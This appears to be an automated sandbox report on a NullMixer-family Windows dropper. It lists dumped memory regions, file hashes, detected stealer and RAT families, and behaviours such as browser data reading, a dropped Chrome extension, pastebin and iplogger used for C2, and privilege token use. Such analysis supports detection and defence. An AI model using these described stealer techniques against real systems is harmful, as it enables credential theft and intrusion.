memory/2620-78-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/1212-137-0x0000000000400000-0x0000000000414000-memory.dmp

memory/2116-136-0x00000000012C0000-0x000000000132A000-memory.dmp

memory/2072-147-0x00000000008F0000-0x0000000000960000-memory.dmp

memory/1000-143-0x0000000000F10000-0x0000000000F2C000-memory.dmp

memory/1212-158-0x0000000000400000-0x0000000000414000-memory.dmp

memory/488-156-0x0000000000400000-0x0000000000414000-memory.dmp

memory/920-155-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/1156-151-0x0000000000400000-0x0000000002F01000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-4MTGS.tmp\Thu125e541847539.tmp

MD5 9303156631ee2436db23827e27337be4
SHA1 018e0d5b6ccf7000e36af30cebeb8adc5667e5fa
SHA256 bae22f27c12bce1faeb64b6eb733302aff5867baa8eed832397a7ce284a86ff4
SHA512 9fe100fafb1c74728109667b5a2261a31e49c45723de748adaa1d9cb9f8daa389b871056c70066fa3a05be82a5017c8dd590ae149a56d824a9e250d31091a40f

memory/1000-162-0x0000000000220000-0x0000000000226000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\is-PPA67.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-PPA67.tmp\idp.dll

MD5 b37377d34c8262a90ff95a9a92b65ed8
SHA1 faeef415bd0bc2a08cf9fe1e987007bf28e7218d
SHA256 e5a0ad2e37dde043a0dd4ad7634961ff3f0d70e87d2db49761eb4c1f468bb02f
SHA512 69d8da5b45d9b4b996d32328d3402fa37a3d710564d47c474bf9e15c1e45bc15b2858dbab446e6baec0c099d99007ff1099e9c4e66cfd1597f28c420bb50fdcc

memory/1524-199-0x0000000002780000-0x0000000002915000-memory.dmp

memory/2620-200-0x0000000000400000-0x000000000051C000-memory.dmp

memory/2620-204-0x000000006EB40000-0x000000006EB63000-memory.dmp

memory/2620-208-0x000000006FE40000-0x000000006FFC6000-memory.dmp

memory/2620-207-0x000000006B440000-0x000000006B4CF000-memory.dmp

memory/2620-206-0x000000006B280000-0x000000006B2A6000-memory.dmp

memory/2620-201-0x0000000064940000-0x0000000064959000-memory.dmp

memory/1524-209-0x0000000002CA0000-0x0000000002D45000-memory.dmp

memory/2744-222-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2744-220-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2744-219-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2744-218-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2744-216-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2808-233-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2744-214-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2744-212-0x0000000000400000-0x0000000000422000-memory.dmp

memory/2744-210-0x0000000000400000-0x0000000000422000-memory.dmp

memory/1524-239-0x0000000000240000-0x00000000002D2000-memory.dmp

memory/1524-236-0x0000000000240000-0x00000000002D2000-memory.dmp

memory/2808-235-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2808-232-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2808-231-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2808-229-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2808-227-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2808-225-0x0000000000400000-0x000000000041E000-memory.dmp

memory/2808-223-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1640-253-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1640-252-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1640-251-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/1640-249-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1640-247-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1640-245-0x0000000000400000-0x000000000041E000-memory.dmp

memory/1640-255-0x0000000000400000-0x000000000041E000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\CabB28.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-22 07:31

Reported

2024-11-22 07:33

Platform

win10v2004-20241007-en

Max time kernel

88s

Max time network

120s

Command Line

"C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe"

Signatures

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

GCleaner

loader gcleaner

Gcleaner family

gcleaner

NullMixer

dropper nullmixer

Nullmixer family

nullmixer

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

PrivateLoader

loader privateloader

Privateloader family

privateloader

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Sectoprat family

sectoprat

Socelars

stealer socelars

Socelars family

socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

ASPack v2.12-2.42

aspackv2
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-1045960512-3948844814-3059691613-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu120bfbc2443b3b5d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A

Reads user/profile data of web browsers

spyware stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A pastebin.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Looks up geolocation information via web service

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\54993cafb45684179f8b736cea27a09c151cd68429344c3a430290c8d5ee359c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12493eba7a.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu128b511c77e8c.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1262fd911d3e6320.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu124078ed79bdbd5.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-NLVLE.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup_installer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\setup_install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu125e541847539.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-D6M32.tmp\Thu125e541847539.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12912263469836d.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu123e05ebe43921.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\mshta.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\taskkill.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu126011caea28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12465fe68f85b6156.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133767343323403090" C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12ca1c119bc29.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu1231d30cda84872.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu12b275ee70c7e913.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS0B6F78A7\Thu122f7469b214cb59.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
N/A N/A C:\Program Files\Google\Chrome\Application\chrome.exe N/A
